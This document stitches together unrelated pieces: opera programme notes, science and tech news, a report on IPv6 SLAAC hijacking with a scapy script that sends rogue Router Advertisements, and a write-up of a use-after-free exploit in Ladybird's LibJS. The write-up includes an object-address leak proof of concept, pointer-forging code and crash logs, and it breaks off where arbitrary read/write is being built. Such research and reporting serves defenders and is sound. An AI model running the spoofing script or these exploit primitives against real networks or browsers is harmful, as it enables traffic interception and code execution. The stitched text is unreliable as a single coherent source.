HOCH-ZEITEN is performed simultaneously by both a choir and an orchestra situated in two separate halls. Since the theme of SONNTAG is "mystical union", audio/video signals are broadcast from one hall into the other during several "Blend-ins" (physically, however, the 2 musical ensembles are completely separate). Typically, an audience will experience a performance of one group in the first hall, and then move into the other hall as the performance is repeated (in other words, the performers exchange audiences between two performances of the same work). The music itself is based around held tones (drones) making a 5-part harmony (and 5 different languages for the choir), with different types of ornamentation featured. These various ornamental articulations are meant to "speak" to each other, using the 5 languages applied to the 5 layers. In addition to the "Blend-ins", the orchestral version has 7 "Memories", where a featured duet/trio occurs. Here, quotes of musical passages from previous Scenes of the LICHT opera cycle appear. These instrumental "Memories" are also heard in the choral version through the orchestral "Blend-ins".
SONNTAGS-ABSCHIED ("Sunday Farewell")
For 5 Synthesizers. Composed and premiered in 2003.
In 2004, the music for HOCH-ZEITEN was adapted for 5 synthesizers. Five performer-programmers (Layers 1-5: Marc Maes, Frank Gutschmidt, Fabrizio Rosso, Benjamin Kobler and Antonio Pérez Abellán) worked with Stockhausen to translate the choir version manuscript into synthetic tones, while preserving the linguistic aspects of the text. When staged, video projections of the keyboardists' hands can be projected onto screens above each player. This version can also be performed by 1 synthesizer accompanied by a tape of the other 4 parts, in which case it is named KLAVIERSTÜCK XIX (Piano Piece 19). Another version of this piece exists as STRAHLEN, which is for multiple vibraphones (some processed digitally).
Sunday From Light celebrates the final convergence and joining of the protagonists Michael and Eve, and therefore minimizes the influence of Lucifer, the LICHT Cycle's antagonist. As Lucifer represents a more conservative, "restrictive" theme, his absence allows this final day of LICHT to have a very open feeling - evocative of an almost ethereal, open-air ritual celebration. Additionally, this final opera presents refined explorations of elements found in earlier points of Stockhausen's half-century career, from the "pointillistic" orchestral textures of Light-Waters (see PUNKTE), to the movement-based, ring-modulated chamber pieces of Light-Pictures (MANTRA), to the spatially-enhanced ritual drone textures of Angel Processions and High-Times (see STIMMUNG, STERNKLANG, INORI). As a final statement of the LICHT opera cycle, however, the composer here unmistakably reaches an apotheosis of sorts for the LICHT superformula.
Dried deposit of a 5 μL blood droplet on a glass surface inclined at 35° to the horizontal, showing differential cracking between the advancing (downhill) and receding (uphill) fronts. The arrow indicates the direction of gravitational acceleration (g). Credit: Bibek Kumar, Sangamitro Chatterjee, Amit Agrawal, Rajneesh Bhardwaj
Drying droplets have fascinated scientists for decades. From water to coffee to paint, these everyday fluids leave behind intricate patterns as they evaporate. But blood is far more complex—a colloidal suspension packed with red blood cells, plasma proteins, salts, and countless biomolecules.
As blood dries, it leaves behind a complex microstructural pattern—cracks, rings, and folds—each shaped by the interplay of its cellular components, proteins, and evaporation dynamics. These features form a kind of physical fingerprint, quietly recording the complex interplay of physics that unfolded during the desiccation of the droplet.
In our recent experiments, we explored how blood droplets dry by varying both their size—from tiny 1-microliter drops to larger 10-microliter ones—and the angle of the surface, from completely horizontal to a steep 70° incline. Using an optical microscope, a high-speed camera, and a surface profiler, we tracked how the droplets dried, shrank and cracked.
On flat surfaces, blood droplets dried predictably, forming familiar coffee-ring-like deposits surrounded by networks of radial and azimuthal cracks. But as we increased the tilt, gravity pulled the red blood cells downhill, while surface tension tried to hold them up. This resulted in asymmetric deposits and stretched patterns—a kind of biological landslide frozen in time.
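A standard way to quantify this competition between gravity and surface tension (our gloss, not necessarily the analysis used in the paper) is the dimensionless Bond number:

\[
\mathrm{Bo} = \frac{\rho g R^{2}}{\sigma}
\]

Here ρ is the fluid density, g the gravitational acceleration, R the droplet's characteristic radius, and σ the surface tension. Because Bo grows as R², a 10-microliter drop feels gravity far more strongly relative to surface tension than a 1-microliter one, consistent with the exaggerated asymmetry of the larger droplets described below.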
Cracking patterns were different on the advancing (downhill) and receding (uphill) sides. On the advancing side, where more dried blood mass accumulated, the cracks were thicker and more widely spaced. On the receding side, where the deposit thinned out, the cracks were finer. Larger droplets (10 microliters) exaggerated the asymmetry even more, with gravity playing a bigger role as the droplets grew heavier—leaving behind a long, thin "tail" of blood that dried with scattered red blood cells.
To explain what we observed, we developed a first-order theoretical model showing how mechanical stresses build up unevenly on either side of the droplet—a difference that helps explain the asymmetric cracking patterns we saw.
These findings have real-world implications. In forensic science, for example, investigators use bloodstain pattern analysis—or BPA—to reconstruct events at crime scenes. Our results suggest that both the tilt of the surface and the size of the droplet can significantly alter the resulting patterns. Ignoring these factors could lead to misinterpretations, potentially affecting how such evidence is read and understood.
This story is part of Science X Dialog, where researchers can report findings from their published research articles.
More information: Bibek Kumar et al, Asymmetric Deposits and Crack Formation during Desiccation of a Blood Droplet on an Inclined Surface, Langmuir (2025). DOI: 10.1021/acs.langmuir.4c03767
Bibek Kumar is a Ph.D. candidate in the Department of Mechanical Engineering at I.I.T. Bombay, Mumbai, India. Sangamitro Chatterjee is an Assistant Professor in the Department of Physics at DIT University, Dehradun, India. Amit Agrawal and Rajneesh Bhardwaj are Professors in the Department of Mechanical Engineering at I.I.T. Bombay.
Citation: Blood droplets on inclined surfaces reveal new cracking patterns (2025, April 30), retrieved 1 May 2025 from https://phys.org/news/2025-04-blood-droplets-inclined-surfaces-reveal.html
Hackers abuse IPv6 networking feature to hijack software updates
Bleeping Computer
www.bleepingcomputer.com
2025-05-01 01:33:42
A China-aligned APT threat actor named "TheWizards" abuses an IPv6 networking feature to launch adversary-in-the-middle (AitM) attacks that hijack software updates to install Windows malware. [...]...
A China-aligned APT threat actor named "TheWizards" abuses an IPv6 networking feature to launch adversary-in-the-middle (AitM) attacks that hijack software updates to install Windows malware.
According to ESET, the group has been active since at least 2022, targeting entities in the Philippines, Cambodia, the United Arab Emirates, China, and Hong Kong. Victims include individuals, gambling companies, and other organizations.
The attacks utilize a custom tool dubbed "Spellbinder" by ESET that abuses the IPv6 Stateless Address Autoconfiguration (SLAAC) feature to conduct SLAAC attacks.
SLAAC is a feature of the IPv6 networking protocol that allows devices to automatically configure their own IP addresses and default gateway without needing a DHCP server. Instead, it utilizes Router Advertisement (RA) messages to receive IP addresses from IPv6-supported routers.
The hacker's Spellbinder tool abuses this feature by sending spoofed RA messages over the network, causing nearby systems to automatically receive a new IPv6 IP address, new DNS servers, and a new, preferred IPv6 gateway.
This default gateway, though, is the IP address of the Spellbinder tool, which allows it to intercept communications and reroute traffic through attacker-controlled servers.
"Spellbinder sends a multicast RA packet every 200 ms to ff02::1 ("all nodes"); Windows machines in the network with IPv6 enabled will autoconfigure via
stateless address autoconfiguration
(SLAAC) using information provided in the RA message, and begin sending IPv6 traffic to the machine running Spellbinder, where packets will be intercepted, analyzed, and replied to where applicable," explains ESET.
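To make the mechanism concrete, here is a minimal Python/scapy sketch of a rogue RA of the kind described. It is illustrative only, not Spellbinder's actual code, and the DNS address uses the 2001:db8:: documentation prefix:

from scapy.all import Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptRDNSS, sendp

# A rogue Router Advertisement: multicast to all nodes, advertising the sender
# as a default gateway and pushing an attacker-chosen DNS server.
ra = (
    Ether()
    / IPv6(dst="ff02::1")                                    # "all nodes" multicast
    / ICMPv6ND_RA(routerlifetime=1800)                       # claim to be a router
    / ICMPv6NDOptRDNSS(dns=["2001:db8::53"], lifetime=1800)  # rogue DNS server
)
sendp(ra, inter=0.2, loop=1)  # one RA every 200 ms, matching ESET's observation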
Abusing IPv6 SLAAC using the Spellbinder tool
Source: ESET
ESET said attacks deploy Spellbinder using an archive named AVGApplicationFrameHostS.zip, which extracts into a directory mimicking legitimate software: "%PROGRAMFILES%\AVG Technologies."
Within this directory are AVGApplicationFrameHost.exe, wsc.dll, log.dat, and a legitimate copy of winpcap.exe. The WinPcap executable is used to side-load the malicious wsc.dll, which loads Spellbinder into memory.
Once a device is infected, Spellbinder begins capturing and analyzing network traffic, looking for attempts to connect to specific domains, such as those related to Chinese software update servers.
ESET says the malware monitors for domains belonging to the following companies: Tencent, Baidu, Xunlei, Youku, iQIYI, Kingsoft, Mango TV, Funshion, Youdao, Xiaomi, Xiaomi Miui, PPLive, Meitu, Qihoo 360, and Baofeng.
The tool then redirects those requests to download and install malicious updates that deploy a backdoor named "WizardNet."
The WizardNet backdoor gives attackers persistent access to the infected device and allows them to install additional malware as needed.
To protect against these types of attacks, organizations can monitor IPv6 traffic or turn off the protocol if it is not required in their environment.
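On the monitoring side, a minimal scapy sketch along these lines can flag RAs from unexpected sources; the KNOWN_ROUTERS allowlist is a placeholder you would fill in with your real routers' MAC addresses:

from collections import defaultdict
from scapy.all import Ether, ICMPv6ND_RA, sniff

KNOWN_ROUTERS = {"00:11:22:33:44:55"}  # placeholder: your legitimate routers
counts = defaultdict(int)

def check_ra(pkt):
    # Alert on any Router Advertisement from a MAC we don't recognize
    src = pkt[Ether].src
    counts[src] += 1
    if src not in KNOWN_ROUTERS:
        print(f"ALERT: rogue Router Advertisement from {src} (seen {counts[src]} times)")

sniff(lfilter=lambda p: ICMPv6ND_RA in p, prn=check_ra, store=False)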
You also mentioned the whole Chatbot Arena thing, which I think is interesting and points to the challenge around how you do benchmarking. How do you know what models are good for which things?
One of the things we've generally tried to do over the last year is anchor more of our models in our Meta ...
You also mentioned the whole Chatbot Arena thing, which I think is interesting and points to the challenge around how you do benchmarking. How do you know what models are good for which things?
One of the things we've generally tried to do over the last year is anchor more of our models in our Meta AI product north star use cases. The issue with open source benchmarks, and any given thing like the LM Arena stuff, is that they’re often skewed toward a very specific set of use cases, which are often not actually what any normal person does in your product. [...]
So we're trying to anchor our north star on the product value that people report to us, what they say that they want, and what their revealed preferences are, and using the experiences that we have. Sometimes these benchmarks just don't quite line up. I think a lot of them are quite easily gameable.
On the Arena you'll see stuff like Sonnet 3.7, which is a great model, and it's not near the top. It was relatively easy for our team to tune a version of Llama 4 Maverick that could be way at the top. But the version we released, the pure model, actually has no tuning for that at all, so it's further down. So you just need to be careful with some of these benchmarks. We're going to index primarily on the products.
RFK Jr.'S HHS Orders Lab Studying Deadly Infectious Diseases to Stop Research
According to an email viewed by WIRED, the Integrated Research Facility in Frederick, Maryland, was told to stop all experimental work by April 29 at 5 pm. The facility is part of the National Institute of Allergy and Infectious Diseases (NIAID) and is located at the US Army base Fort Detrick. It conducts research on the treatment and prevention of infectious diseases that are deemed “high consequence”—those that pose significant risks to public health. It has 168 employees, including federal workers and contractors.
The email, sent by Michael Holbrook, associate director for high containment at the Integrated Research Facility, says the lab is terminating studies on Lassa fever, SARS-CoV-2, and Eastern equine encephalitis, or EEE, a rare but lethal mosquito-borne disease that has been reported in several northern US states. “We are collecting as many samples as is reasonable to ensure these studies are of value,” he says in the email. “We have not been asked to euthanize any animals so these animals will continue to be managed.” Holbrook did not respond to an inquiry from WIRED.
The email says representatives from the Department of Homeland Security were padlocking freezers in biosafety-level-4 labs, those with the highest level of biosafety containment used for studying highly dangerous microbes. Only about a dozen BSL-4 labs exist in North America. These labs work with the viruses that cause Ebola, Lassa fever, and Marburg, types of hemorrhagic fevers. The Integrated Research Facility is one of only a few places in the world that is able to perform medical imaging on animals infected with BSL-4 agents.
“The sacrifice to research is immense,” says Gigi Kwik Gronvall, a senior scholar at the Johns Hopkins Center for Health Security, on the closure. “If things are unused for a period of time, it will cost more money to get them ready to be used again.”
The facility’s director, Connie Schmaljohn, has also been placed on administrative leave, according to the email. Previously, Schmaljohn served as a senior research scientist at the US Army Medical Research Institute of Infectious Diseases. She has more than 200 research publications, and her work has led to several clinical trials of first-of-their-kind vaccines. Schmaljohn also did not respond to an inquiry from WIRED.
In an emailed statement provided to WIRED, Bradley Moss, communication director for the office of research services at NIH, confirmed the halt in research activity. “NIH has implemented a research pause—referred to as a safety stand-down—at the Integrated Research Facility at Fort Detrick. This decision follows identification and documentation of personnel issues involving contract staff that compromised the facility’s safety culture, prompting this research pause. During the stand-down, no research will be conducted, and access will be limited to essential personnel only, to safeguard the facility and its resources.”
Moss did not elaborate on the nature of the personnel issues and said he did not know how long the research pause would last. Staff have not received an anticipated reopening date.
The research pause is the latest disruption to federal science agencies after HHS secretary Robert F. Kennedy Jr. announced at the end of March that 10,000 people across the vast federal health agency would lose their jobs, including those at the National Institutes of Health, Food and Drug Administration, and Centers for Disease Control and Prevention. The mass layoffs are part of a restructuring plan being carried out by President Donald Trump’s so-called Department of Government Efficiency.
Julia Parsons, U.S. Navy Code Breaker During World War II, Dies at 104
You know how every annoying Windows program wants to launch as soon as you boot up your computer? Well, now Office is going to do that, too. A new “Startup Boost” function will set Office to load when Windows starts up, which will make apps like Word and Excel launch faster—while making the rest of your computer slower. Whoopie.
I’m being flippant, but it’s understandable that Microsoft would want to give Office a performance boost, even if it is somewhat illusory. And in the company’s defense, the announcement in the Microsoft 365 Message Center Archive (spotted by The Verge) does say that the new tool will only be enabled on PCs that have at least 8GB of RAM and 5GB of free disk space. I think even trying to run Windows 11 on just 8GB of RAM is kind of optimistic these days, but at least there’s a floor.
A cynic might wonder why Microsoft is making Office start when the computer boots instead of, you know, just making Office more efficient so it can run faster. (There’s no second part to that statement. The cynic is me. I want Office to be more efficient.)
The update to the Microsoft 365 installer will initially only apply to Microsoft Word when it rolls out in mid-May, then spread to other Office programs later. And yes, you will be able to disable this feature. End users can turn it off in Word’s settings or in the Task Scheduler.
Ladybird is a relatively new browser engine originating from the SerenityOS project. Currently, it’s in pre-alpha and improving quickly. Take a look at the website and the GitHub for more information!
I’ll be researching the JavaScript engine of Ladybird, LibJS.
Architecture
LibJS has an interpreter tier and no compilation tiers (yet!). It includes common modern JS engine
optimizations and is built with extensive verification checks across its critical code paths and data
structures, including vectors, making scenarios such as integer overflows leading to out-of-bounds
accesses harder to exploit.
Fuzzing
We’ll be using Fuzzilli, a popular fuzzer for JavaScript interpreters. Here’s the description from the GitHub:
A (coverage-)guided fuzzer for dynamic language interpreters based on a custom
intermediate language ("FuzzIL") which can be mutated and translated to JavaScript.
- Fuzzilli
Fuzzilli can be configured with additional code generators that can be specialized to trigger
specific bugs. LibJS isn’t actively being OSS-fuzzed, so I didn’t add any custom generators and hoped
there would be enough shallow bugs around. There was already some persistent fuzzing code
in LibJS. After some work — like needing to compile and link Skia with RTTI (Nix 💜), fixing
some build scripts, and compiling Fuzzilli with an additional profile (again, Nix was great for this) — I
got it all working!
I ran the fuzzer for ~10 days and found 10 unique crashes. A lot of the bugs were boring:
Initially, I thought the regex bug was an integer overflow… unfortunately, it wasn’t. The real integer overflow in TypedArray looked really promising — but it seems hard to exploit, with all the bounds checks protecting vectors from bad accesses.
There were three bugs that looked really good: a heap buffer overflow, freelist corruption (or UAF) in the garbage
collector, and a heap use-after-free (UAF) in the malloc heap. But unfortunately, only the last UAF was reproducible outside of Fuzzilli.
I'm still not sure why the others didn't reproduce.
This is the crash report for the heap buffer overflow, and this is the one for the freelist corruption, if interested.
The Bug
A Vulnerable Function
The bug is a use-after-free (UAF) on the interpreter’s argument buffer. It’s triggered by using a proxied function object as a constructor, together with a malicious [[Get]] handler.
// 10.2.2 [[Construct]] ( argumentsList, newTarget )
ThrowCompletionOr<GC::Ref<Object>> ECMAScriptFunctionObject::internal_construct(
    ReadonlySpan<Value> arguments_list, // [1]
    FunctionObject& new_target
) {
    auto& vm = this->vm();

    // 1. Let callerContext be the running execution context.
    // NOTE: No-op, kept by the VM in its execution context stack.

    // 2. Let kind be F.[[ConstructorKind]].
    auto kind = m_constructor_kind;

    GC::Ptr<Object> this_argument;

    // 3. If kind is base, then
    if (kind == ConstructorKind::Base) {
        // [2]
        // a. Let thisArgument be ? OrdinaryCreateFromConstructor(newTarget, "%Object.prototype%").
        this_argument = TRY(ordinary_create_from_constructor<Object>(
            vm,
            new_target,
            &Intrinsics::object_prototype,
            ConstructWithPrototypeTag::Tag
        ));
    }

    auto callee_context = ExecutionContext::create();

    // [3]
    // Non-standard
    callee_context->arguments.ensure_capacity(max(arguments_list.size(), m_formal_parameters.size()));
    callee_context->arguments.append(arguments_list.data(), arguments_list.size());
    callee_context->passed_argument_count = arguments_list.size();
    if (arguments_list.size() < m_formal_parameters.size()) {
        for (size_t i = arguments_list.size(); i < m_formal_parameters.size(); ++i)
            callee_context->arguments.append(js_undefined());
    }

    // [3 cont.] ...
The key parts are:
First, it takes a reference to an argument buffer, arguments_list. [1]
Then, it creates a new object with the same prototype as the constructor function. [2]
Then, it executes the constructor with the arguments in arguments_list. [3]
If the vector that arguments_list references is free()’d at any point between [1] and [3], then arguments_list will dangle; and when it’s used for the function call, it leads to a use-after-free.
Let’s look at ordinary_create_from_constructor, called at [2]. It fetches the prototype property from the constructor and creates a new JavaScript object with that prototype. It’s a simple method, but it can have side effects if the constructor happens to be a proxy object.
If we override the constructor function’s [[Get]] internal method, the call to get_prototype_from_constructor can execute arbitrary JavaScript code. This is useful if we can get that code to free the argument buffer.
The Argument Buffer
The interpreter stores arguments for function calls in a vector called m_argument_values_buffer. It can grow, shrink, be freed, or reallocated — and we have some control over when that happens.
For example, if the current buffer holds 5 JS values, and we run:
foo(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
then the buffer will need to be freed and reallocated somewhere with space for 10 JS values.
Using this, we can free the interpreter’s internal argument buffer — the same one that arguments_list still points to — before it’s used to set up the callee_context for the upcoming constructor call.
The fix is to do the prototype [[Get]] strictly after the callee context has been constructed. Here’s the patch.
We override Construct’s [[Get]] internal method with a function that tries to reallocate the argument buffer. Then we invoke the constructor to trigger the bug.
➜ ladybird git:(b8fa355a21) ✗ js bug.js
=================================================================
==8726==ERROR: AddressSanitizer: heap-use-after-free on address 0x5020000038f0 at pc 0x7f98dd1bf19e bp 0x7ffcc8ee2ef0 sp 0x7ffcc8ee2ee8
READ of size 8 at 0x5020000038f0 thread T0
    #0 0x7f98dd1bf19d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbf19d)
    #1 0x7f98dd1bdf8f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbdf8f)
    #2 0x7f98dd22a555 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc2a555)
    #3 0x7f98dd539cdd (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf39cdd)
    #4 0x7f98dce78c0e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x878c0e)
    #5 0x7f98dcdcdc0a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cdc0a)
    #6 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)
    #7 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)
    #8 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)
    #9 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)
    #10 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)
    #11 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)
    #12 0x7f98dae2a2b8 (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a2b8) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)
    #13 0x562b5084ed14 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x42d14)

0x5020000038f0 is located 0 bytes inside of 16-byte region [0x5020000038f0,0x502000003900)
freed by thread T0 here:
    #0 0x562b50940bf8 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x134bf8)
    #1 0x7f98dcd39e1e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x739e1e)
    #2 0x7f98dcd3963d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x73963d)
    #3 0x7f98dce90c12 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x890c12)
    #4 0x7f98dcdcd014 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cd014)
    #5 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)
    #6 0x7f98dd228b7f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc28b7f)
    #7 0x7f98dd225cf6 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc25cf6)
    #8 0x7f98dd530b92 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf30b92)
    #9 0x7f98dd48e458 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xe8e458)
    #10 0x7f98dd09a76f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xa9a76f)
    #11 0x7f98dd232d4b (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc32d4b)
    #12 0x7f98dd22a381 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc2a381)
    #13 0x7f98dd539cdd (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf39cdd)
    #14 0x7f98dce78c0e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x878c0e)
    #15 0x7f98dcdcdc0a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cdc0a)
    #16 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)
    #17 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)
    #18 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)
    #19 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)
    #20 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)
    #21 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)

previously allocated by thread T0 here:
    #0 0x562b50941bc7 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x135bc7)
    #1 0x7f98dcd39c7f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x739c7f)
    #2 0x7f98dcd3963d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x73963d)
    #3 0x7f98dce90c12 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x890c12)
    #4 0x7f98dcdcc161 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cc161)
    #5 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)
    #6 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)
    #7 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)
    #8 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)
    #9 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)
    #10 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)

SUMMARY: AddressSanitizer: heap-use-after-free (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbf19d)
Shadow bytes around the buggy address:
0x502000003600: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x502000003680: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x502000003700: fa fa 00 fa fa fa fd fa fa fa fd fa fa fa 00 fa
0x502000003780: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 00 00
0x502000003800: fa fa fd fd fa fa fd fa fa fa 00 fa fa fa 00 fa
=>0x502000003880: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa[fd]fd
0x502000003900: fa fa 00 fa fa fa 00 fa fa fa 00 00 fa fa 00 fa
0x502000003980: fa fa 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8726==ABORTING
Exploitation
UAFs tend to be a nice primitive to work with. In this case, the UAF occurs in the glibc malloc heap (since that’s where the argument buffer is allocated), rather than in a garbage-collected arena where a lot of objects actually reside. The malloc heap mainly holds backing buffers and such, introducing a bit of complexity when it comes to finding the right objects for a leak; although this is somewhat mitigated by the powerful primitives available.
Leaking an Object
We can craft an addrof-capability by fitting a pointer somewhere inside the old arguments_list allocation, then reading the arguments object from inside the constructor.
Here’s an example of how we can leak the address of an object:
let target = {};
let linked = new FinalizationRegistry(() => {});
function meow() {}

let handler = {
    get() {
        // [2]
        // allocate more than 0x30 to free the chunk
        meow(0x1, 0x2, 0x3, 0x4, 0x5, 0x6);
        // [3]
        // allocate the free'd chunk, with pointer to the target
        linked.register(target, undefined, undefined, undefined, undefined, undefined)
    }
};

function Construct() {
    // [4]
    // read the linked list node, containing the pointer
    console.log(arguments)
}

let ConstructProxy = new Proxy(Construct, handler);

// [1]
// allocate a 0x30 chunk
// 0x8 * 5 (js values) + 0x8 (malloc metadata) = 0x30
new ConstructProxy(0x1, 0x2, 0x3, 0x4, 0x5);
The series of undefined arguments at [3] is to make sure the linked list node is allocated in our free chunk and not in any prelude allocations. FinalizationRegistry places linked list nodes with object pointers on the malloc heap, rendering them a useful structure to leak. Running the exploit, we get the double representation of the pointer; if we repeat it a few times, the values change slightly, subject to ASLR.
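Since the pointer comes back printed as a JavaScript number, we need to reinterpret its IEEE-754 bits to recover the address. A small Python sketch of that decoding step (the example value is invented):

import struct

def double_to_addr(d):
    # Reinterpret the 8 raw bytes of an IEEE-754 double as a little-endian u64
    return struct.unpack("<Q", struct.pack("<d", d))[0]

leaked = 6.9533558069e-310           # invented example of a leaked double
print(hex(double_to_addr(leaked)))   # a heap pointer, shifting with ASLR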
We can fake a JavaScript object pointer in a similar way. We allocate a buffer into arguments_list, write our fake object pointer into it, and then use the fake object inside the constructor.
There are a few additional considerations:
Our free(arguments_list) mechanism relies on vector reallocation, so the size of our target structures needs to increase monotonically, and in steps large enough to trigger a reallocation.
Once we know where our fake object is, we need to tag it in accordance with Ladybird’s nan-boxing scheme, so the engine knows its type.
Apart from that, it’s very similar; and we’ll do so in the next section.
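As a sketch of what that tagging step involves: nan-boxing engines store a type tag in the high bits of an otherwise-invalid NaN and the pointer in the low 48 bits. The tag constant below is an assumption for illustration, not Ladybird's real encoding (LibJS's Value.h has the actual one):

import struct

OBJECT_TAG = 0xFFFA << 48  # assumed tag placement, purely illustrative

def addr_to_boxed_double(addr):
    # Pack a 48-bit pointer under the assumed tag, then reinterpret as a double
    boxed = OBJECT_TAG | (addr & 0xFFFF_FFFF_FFFF)
    return struct.unpack("<d", struct.pack("<Q", boxed))[0]

print(addr_to_boxed_double(0x5020000038f0))  # the value to plant in memory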
Arbitrary Read/Write
Dynamic property lookups on objects are handled by the get_by_value function, shown below. If the key is an index ([1]) and the object is array-like ([2]) (it has an m_indexed_properties member), then the property is fetched from the m_indexed_properties member.
inline ThrowCompletionOr<Value> get_by_value(
    VM& vm,
    Optional<IdentifierTableIndex> base_identifier,
    Value base_value,
    Value property_key_value,
    Executable const& executable
) {
    // [1]
    // OPTIMIZATION: Fast path for simple Int32 indexes in array-like objects.
    if (base_value.is_object() && property_key_value.is_int32() && property_key_value.as_i32() >= 0) {
        auto& object = base_value.as_object();
        auto index = static_cast<u32>(property_key_value.as_i32());
        auto const* object_storage = object.indexed_properties().storage();
        // [2]
        // For "non-typed arrays":
        if (!object.may_interfere_with_indexed_property_access()
            && object_storage) {
            auto maybe_value = [&] {
                // [3]
                if (object_storage->is_simple_storage())
                    return static_cast<SimpleIndexedPropertyStorage const*>(object_storage)->inline_get(index);
                else
                    return static_cast<GenericIndexedPropertyStorage const*>(object_storage)->get(index);
            }();
            if (maybe_value.has_value()) {
                auto value = maybe_value->value;
                if (!value.is_accessor())
                    return value;
            }
        }
    }
    // try some further optimizations, otherwise fallback to a generic `internal_get`
    ...
